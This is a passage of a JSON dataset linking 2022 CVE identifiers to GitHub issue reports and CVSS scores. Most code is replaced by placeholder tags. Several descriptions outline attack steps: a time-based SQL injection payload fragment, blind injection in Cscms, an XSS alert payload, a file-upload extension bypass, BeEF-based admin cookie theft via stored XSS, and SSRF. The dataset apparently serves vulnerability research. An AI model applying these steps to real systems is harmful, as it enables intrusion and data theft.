  81336. "description": "SQL Injection vulnerability on APITAG Exploit Title: SQL Injection vulnerability on APITAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: 'or(sleep NUMBERTAG URL encode all characters payload: APITAG PATHTAG FILETAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81337. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81338. "severity": "CRITICAL",
  81339. "baseScore": 9.8,
  81340. "impactScore": 5.9,
  81341. "exploitabilityScore": 3.9
  81342. },
  81343. {
  81344. "CVE_ID": "CVE-2022-27162",
  81345. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/44",
  81346. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/44",
  81347. "Repo_new": "cskaza/cszcms",
  81348. "Issue_Created_At": "2022-03-14T03:39:56Z",
  81349. "description": "SQL Injection vulnerability on APITAG Exploit Title: SQL Injection vulnerability on APITAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: 'or(sleep NUMBERTAG URL encode all characters payload: APITAG PATHTAG FILETAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81350. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81351. "severity": "CRITICAL",
  81352. "baseScore": 9.8,
  81353. "impactScore": 5.9,
  81354. "exploitabilityScore": 3.9
  81355. },
  81356. {
  81357. "CVE_ID": "CVE-2022-27163",
  81358. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/45",
  81359. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/45",
  81360. "Repo_new": "cskaza/cszcms",
  81361. "Issue_Created_At": "2022-03-14T03:44:05Z",
  81362. "description": "SQL Injection vulnerability on APITAG Exploit Title: SQL Injection vulnerability on APITAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: 'or(sleep NUMBERTAG URL encode all characters payload: APITAG PATHTAG FILETAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81363. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81364. "severity": "CRITICAL",
  81365. "baseScore": 9.8,
  81366. "impactScore": 5.9,
  81367. "exploitabilityScore": 3.9
  81368. },
  81369. {
  81370. "CVE_ID": "CVE-2022-27164",
  81371. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/42",
  81372. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/42",
  81373. "Repo_new": "cskaza/cszcms",
  81374. "Issue_Created_At": "2022-03-14T03:37:15Z",
  81375. "description": "SQL Injection vulnerability on APITAG Exploit Title: SQL Injection vulnerability on APITAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: 'or(sleep NUMBERTAG URL encode all characters payload: APITAG PATHTAG FILETAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81376. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81377. "severity": "CRITICAL",
  81378. "baseScore": 9.8,
  81379. "impactScore": 5.9,
  81380. "exploitabilityScore": 3.9
  81381. },
  81382. {
  81383. "CVE_ID": "CVE-2022-27165",
  81384. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/41",
  81385. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/41",
  81386. "Repo_new": "cskaza/cszcms",
  81387. "Issue_Created_At": "2022-03-14T03:35:23Z",
  81388. "description": "SQL Injection vulnerability on APITAG Exploit Title: SQL Injection vulnerability on APITAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: 'or(sleep NUMBERTAG URL encode all characters payload: APITAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81389. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81390. "severity": "CRITICAL",
  81391. "baseScore": 9.8,
  81392. "impactScore": 5.9,
  81393. "exploitabilityScore": 3.9
  81394. },
  81395. {
  81396. "CVE_ID": "CVE-2022-27333",
  81397. "Issue_Url_old": "https://github.com/Cutegod/idcCMS/issues/1",
  81398. "Issue_Url_new": "https://github.com/cutegod/idccms/issues/1",
  81399. "Repo_new": "Cutegod/idcCMS",
  81400. "Issue_Created_At": "2022-03-15T08:04:41Z",
  81401. "description": "IDCCMS reset CMS Vulnerability . IDCCMS reset CMS Vulnerability Impact version\uff1aIDCCMS NUMBERTAG Download link\uff1a FILETAG System background administrator zone program file check non program file check FILETAG Use burp to capture packets and modify the path to access the cache / web path FILETAG FILETAG Read the current cache / web path and delete APITAG file FILETAG Deleted successfully FILETAG CMS reset can be achieved by visiting the link installation address URLTAG URLTAG FILETAG",
  81402. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  81403. "severity": "HIGH",
  81404. "baseScore": 7.5,
  81405. "impactScore": 3.6,
  81406. "exploitabilityScore": 3.9
  81407. },
  81408. {
  81409. "CVE_ID": "CVE-2022-27365",
  81410. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/12",
  81411. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/12",
  81412. "Repo_new": "chshcms/cscms",
  81413. "Issue_Created_At": "2022-03-16T01:45:29Z",
  81414. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG SQL injection vulnerability exists in Cscms music portal system NUMBERTAG There is a SQL blind injection vulnerability in APITAG Details Add a song after administrator login FILETAG POC CODETAG FILETAG When deleting songs in the recycle bin, construct malicious statements and implement sql injection CODETAG FILETAG The payload executes and sleeps for NUMBERTAG seconds FILETAG FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds Vulnerability source code FILETAG Close \"id\" to achieve blind injection, so the vulnerability exists",
  81415. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  81416. "severity": "HIGH",
  81417. "baseScore": 7.2,
  81418. "impactScore": 5.9,
  81419. "exploitabilityScore": 1.2
  81420. },
  81421. {
  81422. "CVE_ID": "CVE-2022-27366",
  81423. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/13",
  81424. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/13",
  81425. "Repo_new": "chshcms/cscms",
  81426. "Issue_Created_At": "2022-03-16T01:58:50Z",
  81427. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG There is a SQL blind injection vulnerability in APITAG Details Add a song after administrator login FILETAG Add songs first and then delete them into the trash FILETAG FILETAG When restoring songs in the recycle bin, construct malicious statements and implement sql injection FILETAG CODETAG The parameter \"id\" exists time blind, sleeps for NUMBERTAG seconds FILETAG construct payload CODETAG In the figure below, you can see that the first letter of the database is \"c\", so it sleeps for NUMBERTAG seconds to verify that the injection exists FILETAG FILETAG",
  81428. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  81429. "severity": "HIGH",
  81430. "baseScore": 7.2,
  81431. "impactScore": 5.9,
  81432. "exploitabilityScore": 1.2
  81433. },
  81434. {
  81435. "CVE_ID": "CVE-2022-27367",
  81436. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/14",
  81437. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/14",
  81438. "Repo_new": "chshcms/cscms",
  81439. "Issue_Created_At": "2022-03-16T02:17:57Z",
  81440. "description": "SQL injection vulnerability exists in Cscms music portal system APITAG There is a SQL blind injection vulnerability in APITAG Details After the administrator is logged in, you need to add a song album FILETAG CODETAG FILETAG When deleting a song album, malicious statements can be constructed to achieve sql injection FILETAG CODETAG The payload executes and sleeps for NUMBERTAG seconds FILETAG construct payload CODETAG FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds Vulnerability source code FILETAG Close \"id\" to achieve blind injection, so the vulnerability exists",
  81441. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  81442. "severity": "HIGH",
  81443. "baseScore": 7.2,
  81444. "impactScore": 5.9,
  81445. "exploitabilityScore": 1.2
  81446. },
  81447. {
  81448. "CVE_ID": "CVE-2022-27368",
  81449. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/15",
  81450. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/15",
  81451. "Repo_new": "chshcms/cscms",
  81452. "Issue_Created_At": "2022-03-16T02:25:23Z",
  81453. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG SQL injection vulnerability exists in Cscms music portal system NUMBERTAG APITAG Details After the administrator logs in, the following data package is constructed CODETAG The payload executes and sleeps for NUMBERTAG seconds FILETAG construct payload APITAG FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds Vulnerability source code FILETAG",
  81454. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  81455. "severity": "HIGH",
  81456. "baseScore": 7.2,
  81457. "impactScore": 5.9,
  81458. "exploitabilityScore": 1.2
  81459. },
  81460. {
  81461. "CVE_ID": "CVE-2022-27369",
  81462. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/16",
  81463. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/16",
  81464. "Repo_new": "chshcms/cscms",
  81465. "Issue_Created_At": "2022-03-16T02:46:24Z",
  81466. "description": "SQL injection vulnerability exists in Cscms music portal system APITAG There is a SQL blind injection vulnerability in APITAG Details After the administrator is logged in, a news needs to be added FILETAG CODETAG FILETAG delete this article to trash",
  81467. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  81468. "severity": "HIGH",
  81469. "baseScore": 7.2,
  81470. "impactScore": 5.9,
  81471. "exploitabilityScore": 1.2
  81472. },
  81473. {
  81474. "CVE_ID": "CVE-2022-27416",
  81475. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/702",
  81476. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/702",
  81477. "Repo_new": "appneta/tcpreplay",
  81478. "Issue_Created_At": "2022-02-05T08:53:25Z",
  81479. "description": "Bug] Double free. You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug Double free in tcpreplay. To Reproduce Steps to reproduce the behavior NUMBERTAG export CFLAGS=\" g fsanitize=address\" export CXXFLAGS=\" g fsanitize=address NUMBERTAG configure disable local libopts NUMBERTAG make NUMBERTAG tcprewrite i POC1 o /dev/null ASAN ERRORTAG System (please complete the following information): Ubuntu NUMBERTAG LTS, gcc version NUMBERTAG APITAG NUMBERTAG ubuntu NUMBERTAG tcprewrite V ERRORTAG Additional context Add any other context about the problem here.",
  81480. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81481. "severity": "HIGH",
  81482. "baseScore": 7.8,
  81483. "impactScore": 5.9,
  81484. "exploitabilityScore": 1.8
  81485. },
  81486. {
  81487. "CVE_ID": "CVE-2022-27418",
  81488. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/703",
  81489. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/703",
  81490. "Repo_new": "appneta/tcpreplay",
  81491. "Issue_Created_At": "2022-02-05T10:45:27Z",
  81492. "description": "Heap buffer overflow in tcpreplay. You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug heap buffer overflow in tcpreplay To Reproduce Steps to reproduce the behavior NUMBERTAG export CFLAGS=\" g fsanitize=address\" export CXXFLAGS=\" g fsanitize=address NUMBERTAG configure disable local libopts NUMBERTAG make NUMBERTAG tcpreplay edit r NUMBERTAG s NUMBERTAG b C m NUMBERTAG P oneatatime i lo POC NUMBERTAG FILETAG ASAN ERRORTAG System (please complete the following information): Ubuntu NUMBERTAG LTS, gcc version NUMBERTAG APITAG NUMBERTAG ubuntu NUMBERTAG Tcpreplay Version [e.g NUMBERTAG ERRORTAG",
  81493. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81494. "severity": "HIGH",
  81495. "baseScore": 7.8,
  81496. "impactScore": 5.9,
  81497. "exploitabilityScore": 1.8
  81498. },
  81499. {
  81500. "CVE_ID": "CVE-2022-27419",
  81501. "Issue_Url_old": "https://github.com/merbanan/rtl_433/issues/2012",
  81502. "Issue_Url_new": "https://github.com/merbanan/rtl_433/issues/2012",
  81503. "Repo_new": "merbanan/rtl_433",
  81504. "Issue_Created_At": "2022-03-18T01:29:06Z",
  81505. "description": "Stack based Buffer Overflow in rtl NUMBERTAG Command APITAG FILETAG ASAN CODETAG",
  81506. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  81507. "severity": "MEDIUM",
  81508. "baseScore": 5.5,
  81509. "impactScore": 3.6,
  81510. "exploitabilityScore": 1.8
  81511. },
  81512. {
  81513. "CVE_ID": "CVE-2022-27420",
  81514. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/19",
  81515. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/19",
  81516. "Repo_new": "kishan0725/hospital-management-system",
  81517. "Issue_Created_At": "2022-02-11T04:00:00Z",
  81518. "description": "VULNERABLE: SQL Injection in Hospital Management System. SQL injection in FILETAG via the 'patient_contact' param. Create a request to ' FILETAG ': FILETAG Save this request to FILETAG file: FILETAG Run APITAG for the attack: APITAG FILETAG Area of concern in patientsearch.php FILETAG",
  81519. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81520. "severity": "CRITICAL",
  81521. "baseScore": 9.8,
  81522. "impactScore": 5.9,
  81523. "exploitabilityScore": 3.9
  81524. },
  81525. {
  81526. "CVE_ID": "CVE-2022-27428",
  81527. "Issue_Url_old": "https://github.com/bensonarts/GalleryCMS/issues/20",
  81528. "Issue_Url_new": "https://github.com/bensonarts/gallerycms/issues/20",
  81529. "Repo_new": "bensonarts/gallerycms",
  81530. "Issue_Created_At": "2022-03-18T05:30:44Z",
  81531. "description": "NUMBERTAG stored XSS Vulnerability. Alert users who are still using the project Conditions: Common user The album name can inject XSS APITAG Introduce hook. Js of beef FILETAG XSS is triggered when the administrator goes online FILETAG Beef goes online and gets the cookie FILETAG",
  81532. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  81533. "severity": "MEDIUM",
  81534. "baseScore": 5.4,
  81535. "impactScore": 2.7,
  81536. "exploitabilityScore": 2.3
  81537. },
  81538. {
  81539. "CVE_ID": "CVE-2022-27429",
  81540. "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/67",
  81541. "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/67",
  81542. "Repo_new": "cherry-toto/jizhicms",
  81543. "Issue_Created_At": "2022-03-18T13:32:51Z",
  81544. "description": "NUMBERTAG SSRF Vulnerability. SSRF vulnerability with echo exists in the CMS background, and attackers can use this vulnerability to scan local and Intranet ports and attack local and Intranet Jizhicms background. Attackers can use this vulnerability to scan local and Intranet ports, attack local and Intranet services, or carry out DOS attacks The vulnerability is located in the background plug in download function I start a locally accessible Web service with a FILETAG file FILETAG FILETAG \u4f7f\u7528payload CODETAG See the response FILETAG Browser access APITAG FILETAG open by notepad FILETAG As with FILETAG , this was read successfully",
  81545. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81546. "severity": "CRITICAL",
  81547. "baseScore": 9.8,
  81548. "impactScore": 5.9,
  81549. "exploitabilityScore": 3.9
  81550. },
  81551. {
  81552. "CVE_ID": "CVE-2022-27431",
  81553. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/200",
  81554. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/200",
  81555. "Repo_new": "wuzhicms/wuzhicms",
  81556. "Issue_Created_At": "2022-03-18T07:58:14Z",
  81557. "description": "Wuzhicms NUMBERTAG PATHTAG has a SQL Injection Vulnerability. Vulnerability file: PATHTAG public function APITAG { if(isset($GLOBALS FILETAG The vulnerability is located in the management member > member group management list > delete operation FILETAG FILETAG",
  81558. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81559. "severity": "CRITICAL",
  81560. "baseScore": 9.8,
  81561. "impactScore": 5.9,
  81562. "exploitabilityScore": 3.9
  81563. },
  81564. {
  81565. "CVE_ID": "CVE-2022-27466",
  81566. "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/90",
  81567. "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/90",
  81568. "Repo_new": "ming-soft/mcms",
  81569. "Issue_Created_At": "2022-03-20T06:17:38Z",
  81570. "description": "MCMS NUMBERTAG SQLI. A suspicious point was found in the FILETAG file in the lib,ms mdiy NUMBERTAG FILETAG NUMBERTAG APITAG Since the query maps to a method in Java, and this XML corresponds to Content,we looked directly in APITAG and found a call to APITAG query APITAG we can know that the suspicious injection point is APITAG and then try to inject CODETAG APITAG",
  81571. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81572. "severity": "CRITICAL",
  81573. "baseScore": 9.8,
  81574. "impactScore": 5.9,
  81575. "exploitabilityScore": 3.9
  81576. },
  81577. {
  81578. "CVE_ID": "CVE-2022-27470",
  81579. "Issue_Url_old": "https://github.com/libsdl-org/SDL_ttf/issues/187",
  81580. "Issue_Url_new": "https://github.com/libsdl-org/sdl_ttf/issues/187",
  81581. "Repo_new": "libsdl-org/sdl_ttf",
  81582. "Issue_Created_At": "2022-03-19T11:11:01Z",
  81583. "description": "Arbitrary memory overwrite occurs when loading glyphs and rendering text with a malformed TTF file.. Hello, I found a vulnerability in this project. Summary Arbitrary memory overwrite occurs when loading glyphs and rendering text with a malformed TTF file. System Info Operating System: Ubuntu NUMBERTAG Detailed Description When the function APITAG is executed, it internally calls APITAG and APITAG . Since the code load and render glyph data after measuring bitmap size, if the measured size has a problem, it causes memory overflow or arbitrary memory write when rendering the data. The bitmap size of glyph affects variables xstart and ystart . And they are used to calculate the destination of APITAG . Therefore a malformed TTF file that has manipulated glyph data will result in memory corruption. If the rendered string has only characters that mapped malformed glyph data, APITAG occurs when calling APITAG . But, if the string has a character that mapped normally formed glyph data in front of the mal mapped character, the normal character is rendered with corrupted size while APITAG is normally called. So, the normal character's glyph data is overwritten to arbitrary memory addresses with corrupted xstart and ystart . The address will be heap or stack. In the below code and attached malformed TTF file, a character \"T\" has normal glyph data and a character \"S\" has malformed glyph data. Since The address of the calculated destination with xstart and ystart is not a valid memory address, a segmentation fault occurs. debugged data is below. ERRORTAG Reproduce compile the below code and run the program with a malformed TTF file. A malformed TTF file link is here URLTAG main.cpp ERRORTAG compile & run CODETAG Conclusion In my thought, the part of the responsibility for this vulnerability partially rests with APITAG Usually, opening malformed TTF file results in an error code. But in here, it doesn't. 
I will report this issue to APITAG However, I think it would be good to add the routine that checks the range of variables xstart and ystart before calling APITAG .",
  81584. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81585. "severity": "HIGH",
  81586. "baseScore": 7.8,
  81587. "impactScore": 5.9,
  81588. "exploitabilityScore": 1.8
  81589. },
  81590. {
  81591. "CVE_ID": "CVE-2022-27476",
  81592. "Issue_Url_old": "https://github.com/newbee-ltd/newbee-mall/issues/64",
  81593. "Issue_Url_new": "https://github.com/newbee-ltd/newbee-mall/issues/64",
  81594. "Repo_new": "newbee-ltd/newbee-mall",
  81595. "Issue_Created_At": "2022-03-03T03:11:37Z",
  81596. "description": "There is a Cross site scripting vulnerability exists in newbee mall. FILETAG APITAG APITAG alert(\u201cxss\u201d) APITAG in the input box and click Save to complete the form information submission. FILETAG FILETAG APITAG pop up window is triggered when the page is refreshed, and the loophole reproduction is completed FILETAG",
  81597. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  81598. "severity": "MEDIUM",
  81599. "baseScore": 6.1,
  81600. "impactScore": 2.7,
  81601. "exploitabilityScore": 2.8
  81602. },
  81603. {
  81604. "CVE_ID": "CVE-2022-27477",
  81605. "Issue_Url_old": "https://github.com/newbee-ltd/newbee-mall/issues/63",
  81606. "Issue_Url_new": "https://github.com/newbee-ltd/newbee-mall/issues/63",
  81607. "Repo_new": "newbee-ltd/newbee-mall",
  81608. "Issue_Created_At": "2022-03-03T02:35:48Z",
  81609. "description": "There is a File upload vulnerability exists in newbee mall. FILETAG APITAG burpsuite packet capturing agent and click to upload pictures. FILETAG NUMBERTAG By default, the system only supports JPG, PNG and GIF files. We can bypass them by modifying the file suffix. FILETAG APITAG the value of filename to FILETAG FILETAG Get the access path to file upload FILETAG Complete data update FILETAG APITAG the upload file path, and the vulnerability reproduction is completed. FILETAG FILETAG",
  81610. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81611. "severity": "CRITICAL",
  81612. "baseScore": 9.8,
  81613. "impactScore": 5.9,
  81614. "exploitabilityScore": 3.9
  81615. },
  81616. {
  81617. "CVE_ID": "CVE-2022-27607",
  81618. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/677",
  81619. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/677",
  81620. "Repo_new": "axiomatic-systems/bento4",
  81621. "Issue_Created_At": "2022-03-13T16:49:47Z",
  81622. "description": "FILETAG POC FILETAG",
  81623. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  81624. "severity": "HIGH",
  81625. "baseScore": 8.1,
  81626. "impactScore": 5.2,
  81627. "exploitabilityScore": 2.8
  81628. },
  81629. {
  81630. "CVE_ID": "CVE-2022-27820",
  81631. "Issue_Url_old": "https://github.com/zaproxy/zaproxy/issues/7165",
  81632. "Issue_Url_new": "https://github.com/zaproxy/zaproxy/issues/7165",
  81633. "Repo_new": "zaproxy/zaproxy",
  81634. "Issue_Created_At": "2022-03-24T09:53:42Z",
  81635. "description": "Do not use ZAP CA cert for untrusted certs ( CVETAG ). This was originally reported to ZAP via APITAG We rated it as a LOW vulnerability and gave the reporter permission to disclose it, which they have done as CVETAG URLTAG . We have rated it as LOW as we expect ZAP users to know about the sites they are testing and to know not to send any sensitive information to those sites when testing them with ZAP. If testing potentially malicious sites then ZAP users should know to take additional precautions, such as running ZAP in a container environment. If you disagree with our assessment then please comment on this issue. We would have no problem with one of the suggested solutions being implemented but do not believe that this should be the default option. ZAP is heavily used in development environments where self signed certificates are common. Note that ZAP _does_ validate the certificates for the Check For Update functionality to ensure that malicious ZAP updates cannot be downloaded from an untrusted site. From the original report: Summary ZAP proxy does not verify the certificate chain of the HTTPS servers it connects to. For example, it connects without warning to servers presenting a self signed certificate, an expired certificate, etc. This opens up a browser configured to use ZAP as an intercepting proxy to NUMBERTAG man in the middle attacks NUMBERTAG DNS rebinding attacks (to HTTPS servers configured as default virtual server). Impact Man in the middle attack A user should currently avoid sending sensitive information when using a browser through ZAP. In particular, he should avoid connecting using real accounts. Moreover, the user should avoid using an existing browser profile and always use a dedicated profile in order to avoid getting already existing sessions hijacked by a man in the middle. 
DNS rebinding attacks Moreover, a malicious web site could conduct a DNS rebinding attack on some HTTPS services which are usually not vulnerable to DNS rebinding attacks. The certificate chain validation usually blocks DNS rebinding against HTTPS sites. However, as this step is disabled when using ZAP as an intercepting proxy, any HTTPS site which is configured as the default virtual host ends up being vulnerable to DNS rebinding attacks. The attacker could use the user browser to try to attack such a vulnerable site while hiding behing the IP address of the ZAP user. For example, he could try to: brute force passwords; send stored XSS payload; send abusive posts, comments, spam, etc. Another interesting approach would be to attacks HTTPS services hosted in the user internal network, possibly bypassing firewalls, WAFs, etc. Details When connecting to a self signed invalid certificate, ZAP generates a valid generated from its own certificate authority. This certificate is configured as trusted in the browser in order to make the TLS interception work. As a consequence, the browser silently connects to this certificate. Resolution Mirroring the status of the original certificate chain This could be fixed by using the following behaviour by default: not generate a certificate signed by ZAP internal CA when the HTTPS server presents an untrusted certificate chain; replicate the validity period of the original certificate when generating its own server certificate. Using this approach, the user would be warned against invalid certificate chains but could choose to ignore the error by using the same procedure he would use without the intercepting proxy. FILETAG use a similar approach. Rejecting invalid certificate chains Another approach is to refuse the connection when the certificate chain is invalid. This approach is simpler to implement but not as convenient for the user who cannot easily the error. 
For example, when trying to connect HTTPS site presenting a self signed expired certificate, mitmproxy presents a certificate which is accepted by the browser but any HTTP request results in NUMBERTAG error APITAG Gateway). This HTTP error includes a message explaining the reason of the error such as: Certificate verification error for APITAG certificate has expired (errno NUMBERTAG depth NUMBERTAG Certificate verification error for APITAG Hostname mismatch (errno NUMBERTAG depth NUMBERTAG Certificate verification error for self APITAG self signed certificate (errno NUMBERTAG depth NUMBERTAG Certificate verification error for untrusted APITAG self signed certificate in certificate chain (errno NUMBERTAG depth NUMBERTAG ERRORTAG establish TLS with APITAG (sni: None): ERRORTAG validate certificate hostname without SNI')\")",
  81636. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N",
  81637. "severity": "MEDIUM",
  81638. "baseScore": 4.0,
  81639. "impactScore": 1.4,
  81640. "exploitabilityScore": 2.2
  81641. },
  81642. {
  81643. "CVE_ID": "CVE-2022-27920",
  81644. "Issue_Url_old": "https://github.com/kiwix/libkiwix/issues/728",
  81645. "Issue_Url_new": "https://github.com/kiwix/libkiwix/issues/728",
  81646. "Repo_new": "kiwix/libkiwix",
  81647. "Issue_Created_At": "2022-03-23T13:41:50Z",
  81648. "description": "Release NUMBERTAG Following remark from MENTIONTAG at URLTAG Thanks, so URLTAG was only included in NUMBERTAG no released Debian versions are affected, just unstable). Could we do a NUMBERTAG release with just this cherry picked? I note that even APITAG is vulnerable to this. Or if NUMBERTAG is coming pretty soon then waiting wouldn't be too bad. And we should also get a CVE ID assigned for this vulnerability, MENTIONTAG if you haven't gone through this FILETAG before I'm happy to help out. I also believe we should not wait to much to make the release of NUMBERTAG Secure the CI is green on git master [ ] Kiwix Build is OK [ ] Update the Changelog [ ] Update version [ ] Close current milestone and create new one incrementaly (_a priori_ a minor version) [ ] Create a tag on git [ ] Secure new source/sbinaries are published on FILETAG [ ] Update the Github release with the Changelog [ ] Create new empty entry in Changelog (placeholder for future entries) [ ] Publicize these new versions",
  81649. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  81650. "severity": "MEDIUM",
  81651. "baseScore": 6.1,
  81652. "impactScore": 2.7,
  81653. "exploitabilityScore": 2.8
  81654. },
  81655. {
  81656. "CVE_ID": "CVE-2022-27938",
  81657. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/163",
  81658. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/163",
  81659. "Repo_new": "saitoha/libsixel",
  81660. "Issue_Created_At": "2022-03-19T20:57:10Z",
  81661. "description": "FILETAG POC FILETAG",
  81662. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  81663. "severity": "MEDIUM",
  81664. "baseScore": 5.5,
  81665. "impactScore": 3.6,
  81666. "exploitabilityScore": 1.8
  81667. },
  81668. {
  81669. "CVE_ID": "CVE-2022-27939",
  81670. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/717",
  81671. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/717",
  81672. "Repo_new": "appneta/tcpreplay",
